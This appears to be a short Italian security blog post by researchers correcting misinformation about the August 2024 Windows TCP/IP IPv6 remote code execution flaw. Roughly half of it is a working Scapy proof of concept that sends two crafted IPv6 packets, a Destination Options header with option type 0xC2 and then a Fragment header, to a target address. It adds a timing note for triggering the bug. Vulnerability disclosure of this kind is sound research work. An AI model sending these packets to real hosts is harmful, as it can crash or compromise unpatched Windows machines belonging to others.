
Nell'agosto 2024, Microsoft ha rilasciato una patch per una vulnerabilità di esecuzione remota di codice (RCE) nel TCP/IP di Windows. Alcuni ricercatori hanno già pubblicato Proof of Concept (PoC) per questa vulnerabilità e, più o meno nello stesso periodo, i ricercatori di PatchPoint hanno anche completato la loro analisi e riproduzione del problema. A causa della diffusione di informazioni errate su varie piattaforme, incluso Twitter, sembra che i punti critici necessari per attivare questa vulnerabilità siano stati fraintesi. Contrariamente a queste imprecisioni, abbiamo deciso di rilasciare un PoC che dimostra come questa vulnerabilità possa essere attivata con la trasmissione di soli due pacchetti.; In realtà, non è necessario un grande numero di pacchetti per attivare questa vulnerabilità.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Per attivare la vulnerabilità, è richiesto un tempo di attesa di circa 60 secondi